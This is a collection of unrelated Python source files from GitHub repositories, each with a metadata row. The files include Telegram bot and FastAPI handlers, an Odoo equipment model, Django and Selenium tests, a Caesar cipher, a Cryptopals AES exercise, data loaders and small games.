page_size=PAGE_SIZE,
extra_button=lk_button,
),
)
except KeyError as err:
logger.error(f"Ошибка в ключе при просмотре списка категорий: {err}")
except Exception as err:
logger.error(f"Ошибка при просмотре списка категорий: {err}")
@methodist_category_router.callback_query(F.data == "delete_category")
async def delete_category(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Кнопка "Удалить" в разделе редактирования категории."""
try:
await query.answer()
data = await state.get_data()
language = data["language"]
lexicon = LEXICON[language]
await query.message.edit_text(
lexicon["delete_confirmation"],
reply_markup=yes_no_keyboard(
language, "delete_category", "delete_category"
),
)
except Exception as err:
logger.error(f"Ошибка при получении категории: {err}")
@methodist_category_router.callback_query(F.data == "yes:delete_category")
async def category_deletion_confirmation(
query: CallbackQuery, state: FSMContext, session: Session
):
"""Подтверждение удаления категории."""
try:
await query.answer()
data = await state.get_data()
language = data["language"]
lexicon = LEXICON[language]
category_id = data["category_id"]
await category_deleting(session, category_id)
categories = get_all_categories(session)
if not categories:
await query.message.edit_text(
lexicon["no_categories_yet"],
reply_markup=add_category_keyboard(language),
)
return
page_info = generate_categories_list(
categories=categories,
lexicon=lexicon,
page_size=PAGE_SIZE,
methodist=True,
)
category_ids = page_info["categories_ids"]
await state.set_data({})
await state.update_data(
categories=categories,
category_ids=category_ids,
task_info=page_info,
language=language,
current_page=1,
)
await query.message.edit_text(
lexicon["category_deleting"],
reply_markup=back_keyboard(
language, "back_to_category_list", "back_to_category_list"
),
)
except Exception as err:
logger.error(f"Ошибка при удалении категории: {err}")
| Studio-Yandex-Practicum/EdGame_bot | handlers/methodist_categories_handlers.py | methodist_categories_handlers.py | py | 19,739 | python | ru | code | 0 | github-code | 36 |
22968912977 | from fastapi import APIRouter, Depends, Request
from sqlalchemy.orm import Session
from components.auth.logics import AuthLogic
from config.settings import get_db
from framework.api_response import ApiResponse
from framework.decorators import default_api_response, classview
from components.auth.schemas import (
LoginRequestSchema, LoginResponseSchema
)
router = APIRouter(prefix="/auth")
@classview(router)
class LoginView:
session: Session = Depends(get_db)
@router.post("/login")
@default_api_response
async def login(self, request: Request,
login: LoginRequestSchema):
return ApiResponse(
request=request,
request_schema=LoginRequestSchema,
response_schema=LoginResponseSchema,
method=AuthLogic(self.session).login,
body=login
)
| minhhh-0927/cookiecutter-fastapi-sun-asterisk | {{cookiecutter.project_slug}}/components/auth/routers.py | routers.py | py | 857 | python | en | code | 13 | github-code | 36 |
26755841181 | from Crypto.Cipher import AES
from base64 import b64decode
import os
def main():
key = 'YELLOW SUBMARINE'
cipher = AES.new(key, AES.MODE_ECB)
file_path = os.path.expanduser('~/Downloads/7.txt')
with open(file_path, 'r') as f:
data = f.read()
data = b64decode(data)
msg = cipher.decrypt(data).decode('utf-8')
print(msg)
if __name__ == "__main__":
main()
| dominicle8/cryptopals | 1_7.py | 1_7.py | py | 398 | python | en | code | 0 | github-code | 36 |
8756260225 | # License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.addons.of_geolocalize.models.of_geo import GEO_PRECISION
class OFParcInstalle(models.Model):
_name = 'of.parc.installe'
_description = u"Parc installé"
name = fields.Char(string=u"No de série", size=64, required=False, copy=False)
date_service = fields.Date(string=u"Date vente", required=False)
date_installation = fields.Date(string=u"Date d'installation", required=False)
date_fin_garantie = fields.Date(string=u"Fin de garantie")
type_garantie = fields.Selection(selection=[
('initial', u"Initiale"),
('extension', u"Extension"),
('expired', u"Expirée")], string=u"Type de garantie")
product_id = fields.Many2one(comodel_name='product.product', string=u"Produit", required=True, ondelete='restrict')
product_category_id = fields.Many2one(comodel_name='product.category', string=u"Catégorie")
client_id = fields.Many2one(
comodel_name='res.partner', string=u"Client", required=True, domain="[('parent_id','=',False)]",
ondelete='restrict')
client_name = fields.Char(related='client_id.name') # for map view
client_mobile = fields.Char(related='client_id.mobile') # for map view
site_adresse_id = fields.Many2one(
comodel_name='res.partner', string=u"Site installation", required=False,
domain="['|',('parent_id','=',client_id),('id','=',client_id)]", ondelete='restrict')
revendeur_id = fields.Many2one(
comodel_name='res.partner', string=u"Revendeur", required=False, ondelete='restrict')
installateur_id = fields.Many2one(
comodel_name='res.partner', string=u"Installateur", required=False, ondelete='restrict')
installateur_adresse_id = fields.Many2one(
comodel_name='res.partner', string=u"Adresse installateur", required=False,
domain="['|',('parent_id','=',installateur_id),('id','=',installateur_id)]", ondelete='restrict')
note = fields.Text(string="Note")
tel_site_id = fields.Char(string=u"Téléphone site installation", related='site_adresse_id.phone', readonly=True)
street_site_id = fields.Char(string=u"Adresse", related='site_adresse_id.street', readonly=True)
street2_site_id = fields.Char(string=u"Complément adresse", related='site_adresse_id.street2', readonly=True)
zip_site_id = fields.Char(string=u"Code postal", related='site_adresse_id.zip', readonly=True, store=True)
city_site_id = fields.Char(string=u"Ville", related='site_adresse_id.city', readonly=True)
country_site_id = fields.Many2one(
comodel_name='res.country', string=u"Pays", related='site_adresse_id.country_id', readonly=True)
no_piece = fields.Char(string=u"N° pièce", size=64, required=False)
project_issue_ids = fields.One2many(
comodel_name='project.issue', inverse_name='of_produit_installe_id', string=u"SAV")
active = fields.Boolean(string=u"Actif", default=True)
brand_id = fields.Many2one(comodel_name='of.product.brand', string=u"Marque")
modele = fields.Char(string=u"Modèle")
installation = fields.Char(string=u"Type d'installation")
conforme = fields.Boolean(string=u"Conforme", default=True)
state = fields.Selection(
selection=[
('neuf', "Neuf"),
('bon', "Bon"),
('usage', u"Usagé"),
('remplacer', u"À remplacer"),
], string=u"État", default="neuf")
sale_order_ids = fields.Many2many(comodel_name='sale.order', string=u"Commandes")
sale_order_amount = fields.Float(compute='_compute_links')
account_invoice_ids = fields.Many2many(comodel_name='account.invoice', string=u"Factures")
account_invoice_amount = fields.Float(compute='_compute_links')
# Champs ajoutés pour la vue map
geo_lat = fields.Float(string="geo_lat", compute='_compute_geo', store=True)
geo_lng = fields.Float(string="geo_lng", compute='_compute_geo', store=True)
precision = fields.Selection(
GEO_PRECISION, default='not_tried', string="precision", compute='_compute_geo', store=True,
help=u"Niveau de précision de la géolocalisation.\n"
u"bas: à la ville.\n"
u"moyen: au village\n"
u"haut: à la rue / au voisinage\n"
u"très haut: au numéro de rue\n")
lot_id = fields.Many2one(comodel_name='stock.production.lot', string="Lot d'origine")
technician_id = fields.Many2one(comodel_name='hr.employee', string=u"Technicien")
# @api.depends
@api.depends('sale_order_ids', 'account_invoice_ids')
def _compute_links(self):
for parc in self:
parc.sale_order_amount = len(parc.sale_order_ids)
parc.account_invoice_amount = len(parc.account_invoice_ids)
@api.multi
@api.depends('client_id', 'client_id.geo_lat', 'client_id.geo_lng', 'client_id.precision',
'site_adresse_id', 'site_adresse_id.geo_lat', 'site_adresse_id.geo_lng', 'site_adresse_id.precision')
def _compute_geo(self):
for produit_installe in self:
if produit_installe.site_adresse_id:
produit_installe.geo_lat = produit_installe.site_adresse_id.geo_lat
produit_installe.geo_lng = produit_installe.site_adresse_id.geo_lng
produit_installe.precision = produit_installe.site_adresse_id.precision
else:
produit_installe.geo_lat = produit_installe.client_id.geo_lat
produit_installe.geo_lng = produit_installe.client_id.geo_lng
produit_installe.precision = produit_installe.client_id.precision
# @api.onchange
@api.onchange('date_fin_garantie')
def onchange_date_fin_garantie(self):
if self.date_fin_garantie and self.date_fin_garantie < fields.Date.today():
self.type_garantie = 'expired'
elif self.date_fin_garantie and self.date_fin_garantie >= fields.Date.today() and \
self.type_garantie == 'expired':
self.type_garantie = 'extension'
@api.onchange('product_id')
def onchange_product_id(self):
if self.product_id:
self.brand_id = self.product_id.brand_id
self.product_category_id = self.product_id.categ_id
@api.onchange('client_id')
def _onchange_client_id(self):
self.ensure_one()
if self.client_id:
self.site_adresse_id = self.client_id
# Héritages
@api.model
def create(self, vals):
parc = super(OFParcInstalle, self).create(vals)
if parc.revendeur_id and not parc.revendeur_id.of_revendeur:
parc.revendeur_id.of_revendeur = True
if parc.installateur_id and not parc.installateur_id.of_installateur:
parc.installateur_id.of_installateur = True
return parc
@api.multi
def write(self, vals):
res = super(OFParcInstalle, self).write(vals)
if vals.get('revendeur_id'):
non_revendeurs = self.mapped('revendeur_id').filtered(lambda p: not p.of_revendeur)
non_revendeurs.write({'of_revendeur': True})
if vals.get('installateur_id'):
non_installateurs = self.mapped('installateur_id').filtered(lambda p: not p.of_installateur)
non_installateurs.write({'of_installateur': True})
return res
@api.multi
def name_get(self):
"""
Permet dans un SAV lors de la saisie du no de série d'une machine installée de proposer les machines
du contact précédées d'une puce.
Permet dans une DI de proposer les appareils d'une adresse différente entre parenthèses.
"""
if self._context.get('simple_display'):
return super(OFParcInstalle, self).name_get()
result = []
client_id = self._context.get('partner_id_no_serie_puce')
if client_id:
for record in self:
result.append((
record.id,
("-> " if record.client_id.id == client_id else "")
+ (record.name or u"(N° non renseigné)")
+ " - " + record.client_id.display_name))
return result
for record in self:
serial_number = '%s - ' % record.name if record.name else ''
product_name = record.product_id.name
partner_name = record.client_id.display_name
record_name = '%s%s - %s' % (
serial_number,
product_name,
partner_name,
)
result.append((record.id, record_name))
return result
@api.model
def name_search(self, name='', args=None, operator='ilike', limit=100):
"""
Permet dans un SAV lors de la saisie du no de série d'une machine installée de proposer les machines
du contact en premier précédées d'une puce.
Permet, dans une DI, de montrer en 1er les appareils de l'adresse, puis ceux du client et enfin les autres."""
if self._context.get('partner_id_no_serie_puce'):
client_id = self._context.get('partner_id_no_serie_puce')
res = super(OFParcInstalle, self).name_search(name, [('client_id', '=', client_id)], operator, limit) or []
limit = limit - len(res)
res = [(parc[0], "-> " + parc[1]) for parc in res]
res += super(OFParcInstalle, self).name_search(
name, [('client_id', '!=', client_id)], operator, limit) or []
return res
if self._context.get('address_prio_id'):
address_id = self._context.get('address_prio_id')
args = args or []
res = super(OFParcInstalle, self).name_search(
name,
args + [['site_adresse_id', '=', address_id]],
operator,
limit) or []
limit = limit - len(res)
res += super(OFParcInstalle, self).name_search(
name,
args + ['|', ['site_adresse_id', '=', False], ['site_adresse_id', '!=', address_id],
['client_id', '=', address_id]],
operator,
limit) or []
limit = limit - len(res)
res += super(OFParcInstalle, self).name_search(
name,
args + ['|', ['site_adresse_id', '=', False], ['site_adresse_id', '!=', address_id],
['client_id', '!=', address_id]],
operator,
limit) or []
return res
return super(OFParcInstalle, self).name_search(name, args, operator, limit)
# Actions
@api.multi
def action_view_orders(self):
action = self.env.ref('sale.action_quotations').read()[0]
action['domain'] = [('id', 'in', self.sale_order_ids._ids)]
action['context'] = {
'default_of_parc_installe_ids': [(6, 0, self.ids)],
'default_partner_id': len(self) == 1 and self.client_id.id or False,
}
return action
@api.multi
def action_view_invoices(self):
action = self.env.ref('account.action_invoice_tree1').read()[0]
action['domain'] = [('id', 'in', self.account_invoice_ids._ids)]
return action
@api.model
def action_creer_sav(self):
res = {
'name': 'SAV',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'project.issue',
'type': 'ir.actions.act_window',
'target': 'current',
}
active_ids = self._context.get('active_ids')
if active_ids:
parc_installe = self.browse(active_ids[0])
if parc_installe.client_id:
res['context'] = {'default_partner_id': parc_installe.client_id.id,
'default_of_produit_installe_id': parc_installe.id,
'default_of_type': 'di'}
return res
# Autres
@api.model
def recompute_type_garantie_daily(self):
today = fields.Date.today()
all_parc_date_garantie = self.search([('date_fin_garantie', '!=', False)])
# initialiser l'état de garantie pour les parcs qui ont une date de garantie future
parc_garantie = all_parc_date_garantie.filtered(lambda p: p.date_fin_garantie >= today and not p.type_garantie)
parc_garantie.write({'type_garantie': 'initial'})
# Passer l'état de garantie à "Expirée" pour les parcs dont la date de garantie est future
parc_expire = all_parc_date_garantie.filtered(
lambda p: p.date_fin_garantie < today and p.type_garantie != 'expired')
parc_expire.write({'type_garantie': 'expired'})
| odof/openfire | of_parc_installe/models/of_parc_installe.py | of_parc_installe.py | py | 12,772 | python | fr | code | 3 | github-code | 36 |
3118375238 | import torch.optim as optim
ADADELTA_LEARNING_RATE = 0.05
ADADELTA_MOMENTUM = 0.9
ADADELTA_WEIGHT_DECAY = 0.005
def get_adadelta_halnet(halnet,
momentum=ADADELTA_MOMENTUM,
weight_decay=ADADELTA_WEIGHT_DECAY,
learning_rate=ADADELTA_LEARNING_RATE):
return optim.Adadelta(halnet.parameters(),
rho=momentum,
weight_decay=weight_decay,
lr=learning_rate)
| pauloabelha/muellerICCV2017 | optimizers.py | optimizers.py | py | 520 | python | pt | code | 2 | github-code | 36 |
2530109965 | from typing import Tuple
from pricer.pricer import Offer, Basket, Catalogue
def multibuy(item: str, buy: int, get: int) -> Offer:
def offer(basket: Basket, catalogue: Catalogue) -> Tuple[float, Basket]:
basket = basket.copy()
if item not in basket or item not in catalogue:
return 0, basket
if basket[item] >= buy + get:
basket[item] -= (buy + get)
return buy * catalogue[item], basket
else:
return 0, basket
return offer
def discount(item: str, percent: int) -> Offer:
def offer(basket: Basket, catalogue: Catalogue) -> Tuple[float, Basket]:
basket = basket.copy()
if item not in basket or item not in catalogue:
return 0, basket
if basket[item] == 1:
basket.pop(item)
else:
basket[item] -= 1
return catalogue[item] * (100 - percent) / 100, basket
return offer
| zamkot/basket_pricer | pricer/offers.py | offers.py | py | 950 | python | en | code | 0 | github-code | 36 |
31775295098 | """A module defining functions for playing multiplayer games"""
import abc
import socket
import os
import os.path
from . import base
def mk_server(game_name, player_name):
"""Returns a serer for a game"""
socket_name = ("/tmp/%s_%s_%s" % (game_name, player_name, os.getpid()))
if os.path.exists(socket_name):
os.remove(socket_name)
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind(socket_name)
server.listen(1)
conn, addr = server.accept()
return conn
def mk_client(socket_name):
"""Returns a client for a game"""
client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
client.connect("/tmp/%s" % socket_name)
return client
| percivalgambit/gofish_multiplayer | pytermgame/multiplayer.py | multiplayer.py | py | 714 | python | en | code | 0 | github-code | 36 |
9689098423 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.test import TestCase, RequestFactory, Client
from app.tests.mixins import AuthRouteTestingWithKwargs
from app.tests.mixins import Pep8ViewsTests
import app.views as views
performance = views.user_performance_views
class PasswordResetPep8Tests(TestCase, Pep8ViewsTests):
def setUp(self):
self.path = 'app/views/users/performance/'
# /users/:user_id/performance(.:format) only accepts GET and POST
class UserPerformanceIndexRoutingTests(TestCase, AuthRouteTestingWithKwargs):
def setUp(self):
self.factory = RequestFactory()
self.client = Client()
self.route_name = 'app:user_performance_index'
self.route = '/users/10/performance'
self.view = performance.user_performance_index
self.responses = {
'exists': 200,
'GET': 200,
'POST': 200,
'PUT': 405,
'PATCH': 405,
'DELETE': 405,
'HEAD': 405,
'OPTIONS': 405,
'TRACE': 405
}
self.kwargs = {'user_id': 10}
self.expected_response_content = 'Performance History Visualization'
AuthRouteTestingWithKwargs.__init__(self)
| Contrast-Security-OSS/DjanGoat | app/tests/views/test_users_performance.py | test_users_performance.py | py | 1,247 | python | en | code | 69 | github-code | 36 |
34400546796 | from pages.courses.register_course_page import RegisterCoursePage
from utilities.test_status import TestStatus
from pages.home.login_page import LoginPage
import unittest
import pytest
from ddt import ddt, data, unpack
import time
from pages.home.navigation_page import NavigationPage
@pytest.mark.usefixtures("oneTimeSetUp", "setUp")
@ddt
class RegisterCourseTests(unittest.TestCase):
@pytest.fixture(autouse=True)
def objectSetup(self, oneTimeSetUp):
self.courses = RegisterCoursePage(self.driver)
self.ts = TestStatus(self.driver)
self.lp = LoginPage(self.driver)
self.nav = NavigationPage(self.driver)
def set_up(self):
self.nav.navigate_to_all_courses()
@pytest.mark.run(order = 1)
@data (("JavaScript for beginners", "10", "1220", "10"), ("Learn Python 3 from scratch", "20", "1220", "20"))
@unpack
def test_invalid_enrollment(self, courseName, ccNum, ccExp, ccCVV):
self.lp.login("test@email.com", "abcabc")
self.courses.enter_search_field(courseName)
self.courses.click_search_button()
self.courses.select_course()
time.sleep(4)
self.courses.enroll_course(num=ccNum, exp=ccExp, cvv=ccCVV)
result = self.courses.verify_enroll_failed()
self.ts.mark_final("test_invalid_enrollment", result,
"Enrollment Verification")
self.courses.click_all_courses_link()
| dragosavac/Testing_Framework | tests/courses/course_test.py | course_test.py | py | 1,440 | python | en | code | 0 | github-code | 36 |
41120702108 | from default.liststc import length
__k = 3
def __get_ciphered_char(p: str):
# cek apakah char merupakan sebuah alfabet
if 97 <= ord(p) <= 122 or 65 <= ord(p) <= 90:
# cek apakah char merupakan huruf kapital
is_upper_case = p.isupper()
# merubah char menjadi huruf kecil
p = p.lower()
# integer starting lowercase alphabet di format ascii
starting = 97
# lower = 97 122 upper = 65 90
# proses cipher
p_p = abs(ord(p) - ord('a'))
num_p = (p_p + __k) % 26
final_num = starting + num_p
# return berdasarkan apakah huruf tersebut awalnya uppercase atau bukan
return chr(final_num).upper() if is_upper_case else chr(final_num)
# jika char bukan merupakan alfabet, return char yang sama
else:
return p
# loop through string menggunakan fungsi get_ciphered_char
def cipher_string(text: str):
final_text = ""
for i in range(length(text)):
final_text += __get_ciphered_char(text[i])
return final_text
| zidane-itb/tubes-daspro | security/cipher.py | cipher.py | py | 1,054 | python | id | code | 0 | github-code | 36 |
72653392105 | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 2 15:17:31 2020
@author: PARK
"""
import numpy as np
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
def disease_load(val_rate = 0.25, seed = 42, target_split = True):
# Load Data
disease_data = pd.read_csv('./dataset/thyroid_disease/thyroid_disease.csv')
disease_data = disease_data[['Age', 'TSH', 'T3', 'TT4', 'T4U', 'FTI', 'class']]
disease_data['outlier'] = disease_data['class'].apply(lambda x: 0 if x == 3 else 1)
disease_data.drop(columns = 'class', inplace = True)
X = disease_data.drop(columns = 'outlier')
y = disease_data['outlier']
data_size = X.shape[0]
idx = np.arange(data_size)
split_size = int(val_rate * data_size)
np.random.seed(seed)
np.random.shuffle(idx)
tr_idx, val_idx = idx[split_size:], idx[:split_size]
X_train = X.iloc[tr_idx]
y_train = y.iloc[tr_idx]
X_val = X.iloc[val_idx]
y_val = y.iloc[val_idx]
if target_split == True:
return X_train, y_train, X_val, y_val
elif target_split == False:
X_train['label'] = y_train
X_val['label'] = y_val
return X_train, X_val
def tree_load(val_rate = 0.25, seed = 42, target_split = True):
# Load Data
tree_data = pd.read_csv('./dataset/forest_cover_type/covtype.csv')
label = tree_data['Cover_Type']
tree_data = tree_data.iloc[:, :10]
tree_data['Cover_Type'] = label
tree_data['outlier'] = tree_data['Cover_Type'].apply(lambda x: 1 if (x == 3) | (x == 4) | (x == 6) else 0)
tree_data.drop(columns = 'Cover_Type', inplace = True)
X = tree_data.drop(columns = 'outlier')
y = tree_data['outlier']
data_size = X.shape[0]
idx = np.arange(data_size)
split_size = int(val_rate * data_size)
np.random.seed(seed)
np.random.shuffle(idx)
tr_idx, val_idx = idx[split_size:], idx[:split_size]
X_train = X.iloc[tr_idx]
y_train = y.iloc[tr_idx]
X_val = X.iloc[val_idx]
y_val = y.iloc[val_idx]
if target_split == True:
return X_train, y_train, X_val, y_val
elif target_split == False:
X_train['label'] = y_train
X_val['label'] = y_val
return X_train, X_val | Yukkiasuna-sao/Anomaly_Detection | implementation/loaddata.py | loaddata.py | py | 2,300 | python | en | code | 0 | github-code | 36 |
39122782459 | from clases import *
personas = persona()
personas.setNombre("Rene")
personas.setApellidos("Franco")
personas.setAltura(178)
personas.setEdad(200)
print(f"La persona es {personas.getNombre()} {personas.getApellidos()} ")
informatica = informatico()
informatica.setNombre("Paquito")
informatica.setApellidos("Cabezon")
informatica.setAltura(160)
informatica.setEdad(30)
print(f"La persona es : {informatica.getNombre()} {informatica.getApellidos()} ")
| reneafranco/Course | POO-HERENCIAS/main.py | main.py | py | 456 | python | es | code | 0 | github-code | 36 |
41730576127 | # Create the grid
import numpy as np
import pygame
grid_size = 20
# The abstract representation of the grid.
# A nxn grid
grid = np.zeros((grid_size, grid_size))
pygame.init()
screen_width, screen_height = 600, 600
screen = pygame.display.set_mode((screen_width, screen_height))
clock = pygame.time.Clock()
class ClickableTile(pygame.sprite.Sprite):
def __init__(self, pos, size, state, position):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface((size, size))
self.state = state
self.position = position
if self.state == 0:
self.image.fill('darkgrey')
else:
self.image.fill('white')
self.rect = self.image.get_rect(topleft=pos)
def on_click(self):
if self.state == 0:
self.image.fill('white')
self.state = 1
elif self.state == 1:
self.image.fill('darkgrey')
self.state = 0
class GridGenerator:
def __init__(self):
self.grid = np.zeros((grid_size, grid_size))
self.grid[-10:, :] = 1
self.setup_grid()
def setup_grid(self):
self.palette_group = pygame.sprite.Group()
p_tile = screen_width // grid_size
for i in range(grid_size):
for j in range(grid_size):
state = self.grid[i][j]
tile = ClickableTile(((j * p_tile), (i * p_tile)), p_tile - 1, state, position=(i, j))
self.palette_group.add(tile)
def update_grid(self):
for sprite in self.palette_group.sprites():
self.grid[sprite.position[0]][sprite.position[1]] = sprite.state
def print_grid(self):
print(self.grid)
def save_grid(self):
np.save('grid.npy', self.grid)
gridgenerator = GridGenerator()
# Define colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
pos = pygame.mouse.get_pos()
for sprite in gridgenerator.palette_group.sprites():
if sprite.rect.collidepoint(pos):
sprite.on_click()
gridgenerator.update_grid()
# print(gridgenerator.print_grid())
keys = pygame.key.get_pressed()
if keys[pygame.K_SPACE]:
print("saved")
gridgenerator.save_grid()
gridgenerator.palette_group.draw(screen)
# Update the display
pygame.display.update()
clock.tick(30)
pygame.display.flip()
# Quit the game
pygame.quit()
| crimsondevi/PathThroughDestruction | grid.py | grid.py | py | 2,736 | python | en | code | 0 | github-code | 36 |
7020319772 | import urllib.request
import urllib.parse
kw = '日本'
data = {
'wd': kw
}
data = urllib.parse.urlencode(data)
url = 'https://www.baidu.com/s?' + data
headers = {
'User-Agent': 'Mozilla/5.0(Macintosh;IntelMacOSX10.6;rv:2.0.1)Gecko/20100101Firefox/4.0.1'
}
request = urllib.request.Request(url=url, headers=headers)
response = urllib.request.urlopen(request)
#with open('haha.html', 'wb') as fp:
# fp.write(response.read())
with open('haha.html', 'w', encoding='utf-8') as fp:
fp.write(response.read().decode('utf-8')) | thearmada/spider | 3.py | 3.py | py | 527 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.